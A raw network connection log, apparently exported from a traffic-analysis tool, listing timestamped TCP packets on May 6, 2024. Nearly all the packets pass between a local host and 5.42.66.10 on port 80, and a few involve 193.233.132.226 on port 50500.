May 6, 2024 07:53:03.752669096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752670050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752690077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752708912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752742052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752756119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752768040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752782106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752783060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752794027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752806902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752811909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752820015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752832890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752840996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752847910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752862930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752862930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752876043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752876043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752888918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752902031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752914906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752914906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752928972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752942085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752944946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752963066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752963066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.752976894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752990007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.752995968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753005028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753019094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753026962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753032923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753045082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753047943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753060102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753071070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753089905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753119946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753134012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753146887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753160000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753176928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753177881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753190041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753190994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753205061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753211975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753220081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753232956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753238916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753246069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753259897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753268957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753274918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753287077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753288984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753302097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753309011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753314972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753328085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753339052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753340960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753355026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753369093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753370047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753381968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753386021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753395081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753408909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753422976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753422976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753438950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753446102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753452063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753464937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753464937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753479958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753484964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753494024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753506899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753515959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753550053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753699064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753714085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753726006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753737926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753741980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753751040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753765106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753774881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753777981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753791094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753804922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753806114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753818989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753820896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753833055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753846884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753854036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753859997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753873110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753885031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753890038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753899097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753911018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753911972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753925085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753937960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753941059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753951073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753963947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753974915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753978014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.753989935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.753992081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754007101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754015923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754021883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754034996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754034996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754048109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754060984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754066944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754075050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754087925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754101992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754107952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754108906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754121065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754129887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754134893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754148006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754158974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754160881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754174948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754190922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754193068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754213095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754229069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754242897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754245043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754255056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754268885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754271984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754281998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754295111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754302025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754307985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754319906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754331112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754333019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754347086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754352093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754363060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754375935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754379988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754389048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754389048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754403114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754415989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754420996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754429102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754443884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754451036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754456043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754466057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754470110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754483938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754487991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754497051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754509926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754515886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754523039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754535913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754547119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754549980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754555941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754561901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754575014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754581928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754589081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754614115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754638910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754640102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754653931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754667044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754683018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754692078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754693985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754707098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754719973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754735947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754736900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754749060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754762888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754765034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754777908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754791975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754818916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754868984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754887104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754900932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754913092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754914045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754925966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754937887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754944086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754951954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754965067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754970074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754981041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.754992962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.754995108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755002022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755008936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755022049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755033016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755036116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755048990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755057096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755064011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755072117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755076885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755096912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755105972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755110979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755124092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755129099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755137920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755150080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755156994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755162954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755177021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755184889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755191088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755203962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755204916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755219936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755228996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755233049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755248070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755259991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755261898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755275011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755276918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755290031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755304098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755306959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755317926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755331993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755332947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755345106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755347967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755359888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755374908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755374908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755389929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755403042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755405903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755415916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755417109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755431890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755445004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755448103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755459070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755474091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755475044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755487919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755490065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755502939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:03.755517006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.755547047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.779535055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.779644966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:03.840069056 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:03.840087891 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:03.840138912 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:03.840238094 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:04.005439043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005467892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005481958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005496025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005510092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005533934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005565882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005583048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005595922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005609035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005621910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005625010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005635023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005660057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005660057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005672932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005685091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005693913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005698919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005713940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005724907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005728006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005752087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005772114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005793095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005805016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005815983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005829096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005846024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005858898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005872011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005872965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005899906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005904913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005918026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005927086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005930901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.005947113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005964994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.005975962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006272078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006325006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006325960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006339073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006354094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006367922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006397963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006397963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006412029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006428003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006437063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006469965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006472111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006481886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006493092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006505966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006520987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006521940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006532907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006546974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006561995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006561995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006587029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006601095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006603956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006613970 CEST	80	49741	5.42.66.10	192.168.2.4
